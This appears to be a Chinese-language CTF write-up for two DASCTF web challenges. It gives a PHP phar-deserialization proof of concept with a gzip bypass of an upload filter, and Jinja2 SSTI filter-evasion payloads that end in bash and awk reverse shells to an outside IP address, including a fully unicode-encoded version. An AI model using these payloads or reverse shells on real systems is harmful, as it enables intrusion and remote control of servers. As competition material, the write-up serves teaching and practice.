DASCTF七月赋能赛

WEB

1.Ez to getflag

图片查看存在任意文件读取,可以读取到upload.php class.php index.php

文件上传点检测过滤$filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';

文件读取点过滤了'/http|https|file:|php:|gopher|dict|\.\./i'

看到class.php中存在危险函数include($door); 可以通过上传文件实现phar反序列化

Test:__destruct=>Upload:__tostring=>Show:__get=>show:__call=>backdoor()

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
class Test{
    public $str;
}
class Upload {
    public $f;
    public $fname;
    public $fsize;
    function __construct(){
        $this->fname=new Show;
        $this->fsize='phpinfo';//改成/flag
    }
}
class Show{
    public $source;
}
$a=new Test;
$a->str=new Upload();
echo serialize($a);
$phar = new Phar("poc.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

?>

创建完phar文件后,为了绕过文件内容的检测,可以使用gzip压缩一下

1
2
3
4
5
6
7
8
import gzip

with open('poc.phar', 'rb') as file:
    f = file.read()

newf = gzip.compress(f) #对Phar文件进行gzip压缩
with open('poc.png', 'wb') as file:#更改文件后缀
    file.write(newf)
1
2
poc.png--->23f1a0f70f076b42b5b49f24ee28f696
/file.php?f=phar://upload/23f1a0f70f076b42b5b49f24ee28f696.png&_=1713073174353

Harddisk

ssti

过滤了

1
2
3
4
5
6
{{	_	. [ print 空格 `
对于双括号的过滤可以考虑用{%set%}来绕过,由于ban掉了print,也就注定了这一题没有回显,所以最终肯定是要利用反弹shell的
对于关键字的绕过,经测试可以使用unicode编码达到绕过的目的
执行命令使用标签{%if%}{%endif%},这是无回显的,肯定得用反弹shell
我们原来的paylaod可以为{%set c=lipsum|attr("__globals__")|attr("__getitem__")("__builtins__")|attr("eval")("__import__('os')")|attr("popen")("bash -c 'bash -i >& /dev/tcp/47.237.137.220/7777 0>&1'")|attr("read")()%}{%if c%}1{%endif%}
空格可以用%09去替代,

反弹shell用bash可能不成功

1
awk 'BEGIN {s = "/inet/tcp/0/47.237.137.220/7777"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
1
{%set poc="awk%20'BEGIN%20%7Bs%20%3D%20%5C%22%2Finet%2Ftcp%2F0%2F47.237.137.220%2F7777%5C%22%3B%20while(42)%20%7B%20do%7B%20printf%20%5C%22shell%3E%5C%22%20%7C%26%20s%3B%20s%20%7C%26%20getline%20c%3B%20if(c)%7B%20while%20((c%20%7C%26%20getline)%20%3E%200)%20print%20%5C%240%20%7C%26%20s%3B%20close(c)%3B%20%7D%20%7D%20while(c%20!%3D%20%5C%22exit%5C%22)%20close(s)%3B%20%7D%7D'%20%2Fdev%2Fnull"%}{%set c=lipsum|attr("__globals__")|attr("__getitem__")("__builtins__")|attr("eval")("__import__('os')")|attr("popen")(poc)|attr("read")()%}{%if c%}1{%endif%}

payload:

1
{%set%09c=lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f")|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("eval")("\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029")|attr("\u0070\u006f\u0070\u0065\u006e")("\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u0034\u0037\u002e\u0032\u0033\u0037\u002e\u0031\u0033\u0037\u002e\u0032\u0032\u0030\u002f\u0037\u0037\u0037\u0037\u0020\u0030\u003e\u0026\u0031\u0027")|attr("\u0072\u0065\u0061\u0064")()%}{%if%09c%}1{%endif%}